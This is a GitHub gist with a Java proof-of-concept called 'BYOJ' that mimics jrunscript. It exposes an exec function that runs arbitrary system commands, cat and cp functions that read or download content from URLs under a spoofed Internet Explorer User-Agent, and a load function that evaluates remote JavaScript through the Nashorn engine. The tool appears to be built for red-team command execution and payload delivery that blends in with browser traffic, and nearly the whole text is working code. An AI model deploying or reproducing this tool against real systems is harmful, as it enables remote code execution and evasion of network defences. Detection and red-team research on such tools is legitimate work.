-
-
Save h4wkst3r/1cc4aacbe283ab7cb2eeb08e7fa4056e to your computer and use it in GitHub Desktop.
Bring Your Own JRunscript PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import java.io.BufferedInputStream; | |
import java.io.BufferedOutputStream; | |
import java.io.BufferedReader; | |
import java.io.DataInputStream; | |
import java.io.File; | |
import java.io.FileInputStream; | |
import java.io.FileOutputStream; | |
import java.io.FileWriter; | |
import java.io.IOException; | |
import java.io.InputStreamReader; | |
import java.io.Reader; | |
import java.net.URL; | |
import java.net.URLConnection; | |
import javax.script.ScriptEngine; | |
import javax.script.ScriptEngineManager; | |
import javax.script.ScriptException; | |
public class BYOJ { | |
/** | |
* Starts a child process, executes the specified command, waits for completion, and returns the exit code. | |
* | |
* @param cmd | |
* @throws IOException | |
* @throws InterruptedException | |
*/ | |
@SuppressWarnings("deprecation") | |
public static void exec(String cmd) throws IOException, InterruptedException { | |
Process process = java.lang.Runtime.getRuntime().exec(cmd); | |
DataInputStream inp = new DataInputStream(process.getInputStream()); | |
String line = null; | |
while ((line = inp.readLine()) != null) { | |
System.out.println(line); | |
} | |
process.waitFor(); | |
int exit = process.exitValue(); | |
} // end exec method | |
/** | |
* Shows the content of a file, URL, or InputStream specified by path. Optionally, you can specify pattern to show only the matching contents. | |
* | |
* @param obj | |
* @param pattern | |
* @throws IOException | |
*/ | |
public static void cat(Object obj, String pattern) throws IOException { | |
if (obj instanceof File && ((File) obj).isDirectory()) { | |
//ls(obj); | |
System.out.println(obj.toString()); | |
return; | |
} | |
// if not reading from URL | |
if (!obj.toString().contains("http://") && !obj.toString().contains("https://")) { | |
FileInputStream inp = null; | |
if (!(obj instanceof Reader)) { | |
inp = new FileInputStream((String) obj); | |
obj = new BufferedReader(new InputStreamReader(inp)); | |
} | |
String line; | |
while ((line=((BufferedReader) obj).readLine()) != null) | |
System.out.println(line); | |
} // end if not reading from URL | |
// if reading from URL | |
else { | |
URL theURL = new URL(obj.toString()); | |
URLConnection conn = theURL.openConnection(); | |
conn.setRequestProperty("User-Agent","Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"); | |
conn.connect(); | |
BufferedReader in = new BufferedReader(new InputStreamReader(conn.getInputStream())); | |
String inputLine; | |
while ((inputLine = in.readLine()) != null) | |
System.out.println(inputLine); | |
in.close(); | |
} // end if reading from URL | |
} // end cat method | |
/** | |
* Copies a file, URL, or stream to another file or stream. | |
* | |
* @param from | |
* @param to | |
* @throws IOException | |
*/ | |
public static void cp(String from, String to) throws IOException { | |
if (from == to) { | |
System.out.println("file " + from + " cannot be copied onto itself!"); | |
return; | |
} | |
// if not reading from URL | |
if (!from.toString().contains("http://") && !from.toString().contains("https://")) { | |
FileInputStream inp = new FileInputStream(from); | |
FileOutputStream out = new FileOutputStream(to); | |
BufferedInputStream binp = new BufferedInputStream(inp); | |
BufferedOutputStream bout = new BufferedOutputStream(out); | |
byte [] buff = new byte[1024]; | |
int len; | |
while ((len = binp.read(buff)) > 0 ) | |
bout.write(buff, 0, len); | |
bout.flush(); | |
inp.close(); | |
out.close(); | |
} // end if not reading from URL | |
// if reading from URL | |
else { | |
URL theURL = new URL(from.toString()); | |
URLConnection conn = theURL.openConnection(); | |
conn.setRequestProperty("User-Agent","Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"); | |
conn.connect(); | |
BufferedReader in = new BufferedReader(new InputStreamReader(conn.getInputStream())); | |
FileWriter fw = new FileWriter(to); | |
String inputLine; | |
while ((inputLine = in.readLine()) != null) | |
fw.write(inputLine + "\n"); | |
in.close(); | |
fw.close(); | |
} // end if reading from URL | |
} // end cp method | |
/** | |
* Main function | |
* | |
* @param args | |
* @throws ScriptException | |
* @throws IOException | |
* @throws InterruptedException | |
*/ | |
public static void main(String[] args) throws ScriptException, IOException, InterruptedException { | |
// put this check in when doing for real to ensure number of arguments given is correct | |
if(args.length != 2) { | |
System.out.println("[-] Ensure you use correct syntax"); | |
return; | |
} | |
// initialize nashorn scripting engine | |
ScriptEngineManager manager = new ScriptEngineManager(); | |
ScriptEngine nashorn = manager.getEngineByName("nashorn"); | |
// get the -e switch and the function to be ran | |
String theSwitch = args[0]; | |
String theFunction = args[1]; | |
// if -e switch was not given | |
if (!theSwitch.toLowerCase().equalsIgnoreCase("-e")) { | |
System.out.println("[-] Must specify -e flag first"); | |
return; | |
} // end if -e switch was not given | |
// otherwise all is good, proceed | |
else { | |
// get just the function name | |
String justFunction = theFunction.substring(0, theFunction.indexOf("(")); | |
// exec function | |
if (justFunction.toLowerCase().equals("exec")) { | |
// get the command to be ran | |
String theCommand = theFunction.substring(theFunction.indexOf("(")+1, theFunction.indexOf(")")); | |
theCommand = theCommand.substring(1, theCommand.length()-1); // ignore first and last single quote | |
exec(theCommand); | |
} // end if using exec function | |
// cat function | |
else if (justFunction.toLowerCase().equals("cat")) { | |
String thePath = theFunction.substring(theFunction.indexOf("(")+1, theFunction.indexOf(")")); | |
thePath = thePath.substring(1, thePath.length()-1); // ignore first and last single quote | |
cat(thePath, ""); | |
} // end if using cat function | |
// cp function | |
else if (justFunction.toLowerCase().equals("cp")) { | |
String theArgs = theFunction.substring(theFunction.indexOf("(")+1, theFunction.indexOf(")")); | |
String [] theArgsSplit = theArgs.split(","); | |
String from = theArgsSplit[0].substring(1, theArgsSplit[0].length()-1); | |
String to = theArgsSplit[1].substring(1, theArgsSplit[1].length()-1); | |
cp(from, to); | |
} // end if using cp function | |
// load function | |
else if (justFunction.toLowerCase().equals("load")) { | |
System.setProperty("http.agent", "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"); | |
nashorn.eval(theFunction); | |
} // end if using load function | |
// if function not recognized | |
else { | |
System.out.println("[-] Function not recognized."); | |
return; | |
} // if function not recognized | |
} // end otherwise, proceed | |
} // end main | |
} // end BYOJ class |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment